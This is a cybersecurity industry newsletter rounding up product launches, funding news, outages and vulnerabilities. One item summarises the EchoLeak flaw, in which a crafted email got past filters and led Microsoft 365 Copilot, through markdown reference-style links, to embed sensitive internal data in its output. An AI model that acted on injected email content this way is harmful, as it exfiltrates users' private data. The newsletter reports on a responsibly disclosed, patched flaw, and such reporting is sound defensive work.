Welcome to The Cybersecurity Pulse (TCP)! I'm Darwin Salazar, GTM lead at Monad and former detection engineer at DataDog. Each week, I bring you the latest security product innovation and industry news. Subscribe below for weekly updates!

Are You Patching KEVs That Can't Actually Hurt You?

OX’s latest research reveals why blindly patching every KEV is a waste of time — and what to do instead.

👉 Download Now

What’s up! 👋🏽 What a past couple of weeks its been. I took last week off to focus on our OCSF launch at Monad, so this week's TCP will be jam-packed. Here's a quick recap for those who have lost track:

• 🚷 Google breaks half the internet including Cursor, Anthropic, Cloudflare, Spotify, and more.

• 🪲 Zero-click vuln found in Microsoft 365 Copilot and a vuln in Asana's MCP server.

• 🤖 An AI agent (XBOW) takes over the HackerOne leaderboard

• ⚖️OWASP announces AI Vulnerability Scoring System (AIVSS) effort

• 🕵️Maze raises $25M to fix cloud vuln management with AI agents

• 🤝 Wiz and CrowdStrike each deepen partnership with NVIDIA

• 👁️Varonis launches UEBA and prompt monitoring for ChatGPT Enterprise

• 💰Tines and Semgrep-backers, Felicis Ventures raise $900M

• Elon and Trump publicly spat then make up..

• Protests + riots

• World on the brink of World War III

In all seriousness, it's a fairly intense time in human history. For my readers and friends in Israel, Iran and everywhere in between, I'm praying for your safety and a ceasefire soon.

That said, let’s cyber.

⚒️ Picks of the Week ⚒️

Aim Security discovers EchoLeak, Zero-Click Vulnerability in Microsoft Copilot

Aim Security's research team recently found a vuln in Microsoft's 365 Copilot that allowed it to exfiltrate data without any user interaction. To exploit the vuln, all an attacker had to do was craft a specially formatted email designed to bypass security filters and trigger Copilot (using markdown reference-style linking) to unknowingly embed sensitive internal data in its response.

While Aim followed responsible disclosure practices and Microsoft has since patched the vuln, this EchoLeak sends a stark reminder to our industry:

AI is expanding our attack surface and introducing new vulnerability class types.. In other words, AI is introducing unknown unknowns due to its complexity and how deeply integrated it's becoming. It's very difficult to threat model or plan for what you don't know which is why most security leaders prefer to isolate AI workloads and host them in controlled on-prem environments. Unknown unknowns are the scariest of all vuln classes.

Kudos to the Aim team for the great research!

Spying on North Korean hackers in real-time: an npm malware saga

At 1 p.m., our malware analysis engine alerted us to a potential malicious package that had been added to NPM. The first indications suggested this would be a clear-cut case; however, when we started peeling back the layers, things weren’t quite as they seemed…

Here is a story about how sophisticated nation-state actors can hide malware within packages.

👉 Watch the breakdown here

Asana's MCP Vulnerability

On June 4th, a bug was recently found in Asana's MCP server which could have exposed sensitive data (i.e., projects + task details) from one Asana org to another. No evidence of exploitation and Asana has since issued a patch. While MCPs are all the hype and unlock a ton of biz value, they should go through the same rigorous security testing, monitoring, and governance as all other critical systems.

OWASP Top 10 Kicks Off the AI Vulnerability Scoring System (AIVSS) Project

I know what you're thinking.. "Do we really need another vulnerability scoring system?".. In my opinion, we don't. CVSS scoring is wide enough to cover AI vulns and this is validated by the fact that AIVSS heavily relies on CVSS for its demo calculator…

However, OWASP does state that the new scoring system is meant to address demands that specifically cover vulns inherent in the technologies underlying AI agents + building a future-proof system + fostering knowledge sharing across the AI security community. We'll see what comes from this, but I do think that our industry is tired of dealing with the continuously expanding scope of scoring systems, compliance frameworks, Top 10s, etc. What shall we call this? "Framework bloat"?

Google Cloud Outage Update

Things got weird last Thursday afternoon when consumer and enterprise apps used by hundreds of millions of people starting erroring out. The root cause was a null pointer bug that caused Google Cloud's Service Control service binary to crash out. This brought down many of Google and Google Cloud's major services including Gmail, Docs, Cloud Shell, and their IAM service. It also caused an outage for Anthropic, Discord, Spotify, and even Cloudflare. The resulting Cloudflare outage resulted in even more 3rd party services being down given how many orgs use Cloudflare as their CDN and for traditional cloud services.

Luckily Google's SRE team had a fix out within an hour, but I think this was a wake-up call for many. Are you prepared for when your cloud provider and CDN go down?

In any case, here's some additional documentation if you'd like to dig deeper:

• Google's official Incident report + changes moving forward

• Cloudflare's official postmortem

• A really great technical deep dive from

  ByteByteGo Newsletter

Maze Banks $25M to Tackle Cloud Security With AI Agents

Maze is one of those startups that flips traditional security approaches on its head. In my opinion, they've simultaneously ushered in a new wave of what vulnerability management should look like moving forward and a playbook of how AI agents should be leveraged for security.

The solution ingests cloud vulns from tools (i.e., Wiz, CrowdStrike) and then has AI agents perform investigations directly in the customer's cloud environment to determine what's exploitable, likelihood, attack paths, and either a) auto-remediate or b) propose a remediation plan.

Many large enterprises especially those in the Fortune 500 have vulnerability backlogs of 100K+ findings, deploying agents in a careful manner is a great way to find the needle in the haystack that will actually get you popped.

Maze recently raised a $25M Series A from Theory Ventures, Cherry Ventures and Tapestry VC. Kudos to the Maze team (and their website designers)! 🦾

🔮 The Future of Security 🔮

AI Security

Wiz and CrowdStrike each deepen partnership with NVIDIA

Wiz and CrowdStrike have both expanded their cloud security capabilities to cover NVIDIA's LLM NIM (prebuilt inferencing microservices) and NeMo (AI tool building platform).

This is a net win for both customer bases and their channel partners + really great to see NVIDIA continuing to invest in security.

Dig Deeper:

• CrowdStrike and Nvidia Add LLM Security, Offer New Service for MSSPs

• Wiz Integrates with NVIDIA Enterprise AI Factory Validated Design

More AI Security news ⬇️

• The New AI Attack Surface — How Cortex Cloud Secures MCP

• Securing AI Agent Innovation with Prisma AIRS MCP Server

• Operant AI expands Gatekeeper platform with MCP Gateway for AI runtime security

Application Security

Ghost Security's self-serve is live!

My friend's at Ghost are tackling the SAST and DAST space with AI agents and have built an amazing solution that is now self-serve free of charge!

There's nothing I love more than a self-serve product trial. Users and specifically engineers, do not want to sit through long sales cycles or talk with someone to see a demo. Of course, GTM teams have to balance that with proper filters and guardrails to encourage paid conversion.

More AppSec news ⬇️

• GitHub: How Code Provenance Can Prevent Supply Chain Attacks

• Wiz Research: Leaking Secrets in the Age of AI

Cloud Security

Tamnoon Launches Managed CDR and AI Agent for Cloud Security

Tamnoon has launched Managed Cloud Detection and Response (MCDR) and AI agent to help with cloud security remediation. Since Day 1, Tamnoon has always placed a distinct focus on remediation (a true PITA) and it's great to see their product continue to evolve.

More Cloud Security news ⬇️

• CloudQuery Raises $16M in Fresh Funding

Data Security

Varonis launches data security monitoring for ChatGPT Enterprise

Varonis now provides extensive real-time monitoring and detection to alert when employees upload sensitive data to ChatGPT. The solution combines real-time scanning of AI conversations, behavioral threat detection, and complete audit trails to prevent accidental data exposure.

Cyera raises $540M at $6B valuation 💰

Cyera, one of the fastest growing security startups in history has raised a $540M Series E round led by Georgian, Greenoaks and Lightspeed Venture Partners. This funding comes ~six months after the company raised $300 million. Existing investors Accel, Coatue, Cyberstarts, Redpoint, Sapphire Ventures, Sequoia Capital and Spark Capital also participated in the round

More Data Security news ⬇️

• How to create post-quantum signatures using AWS KMS and ML-DSA

Governance, Risk, and Compliance (GRC)

Vanta launches AI Agent to automate compliance workflows

Vanta launches AI agent to streamline compliance.

Identity and Access Management

SpecterOps Privilege Zones enables security teams to define logical access boundaries

SpecterOps launches "Privilege Zones" for BloodHound Enterprise. The feature basically lets teams define custom security zones and then uses BloodHound's attack path analysis to detect when identities violate those boundaries across hybrid Microsoft/Azure environments. Enforceable privilege zones is pretty cool

More IAM Security news ⬇️

• Veza tackles AI credential surge with new nonhuman identity protections

• Update: Dumping Entra Connect Sync Credentials

• Grip Security Launches ITDR 2.0 to Strengthen SaaS Identity Protection

Offensive Security

Horizon3.ai Raises $100 Million in Series D Funding

Title says it all. Total funding at $178.5M. Series D round led by NEA, 9Yards, Craft Ventures and SignalFire. Horizon3's execution and platform evolution has been great to witness.

More Offensive Security news ⬇️

• Kali Linux 2025.2 delivers Bloodhound CE, CARsenal, 13 new tools

Security Operations

Monad launches pre-built OCSF templates

Field-level manual mapping to OCSF is tedious + time consuming so we've recently launched pre-built OCSF templates to make SecOps teams lives easier. You can take Monad for a spin with our self-serve tier here.

Here's the announcement post if you'd like to dig deeper.

Please reach out if you have any questions or feedback!

More SecOps news ⬇️

• AWS CIRT announces the launch of the Threat Technique Catalog for AWS

• Swimlane Secures $45M to Scale Security Automation and Channel Growth

• Red Canary Expands AI Innovations to Cut Alert Overload

• Wiz: Building a Security Operations Center for the Cloud: Key Considerations for People, Processes, and Technology

• GuidePoint Security Launches Incident Response Maturity Assessment to Help Organizations Reduce Cyber Risk

• Cymulate streamlines threat detection with AI-powered detection engineering assistant

Venture Land 🌇

After a string of successes, early-stage fund Felicis raises fresh $900M

Felicis Ventures is one of the top performing VCs in security over the past 5 years with big winners like Tines, Semgrep, and ConductorOne. They've recently raised $900M of fresh powder and it'll be fun to see what bets and investments they make moving forward.

Interested in sponsoring TCP?

Sponsoring TCP not only helps me continue to bring you the latest in security innovation, but it also connects you to a dedicated audience of ~6,000 CISOs, practitioners, founders, and investors across 100+ countries 🌎

👉 Learn more here!

Bye for now 👋🏽

That’s all for this week… ¡Nos vemos la próxima semana!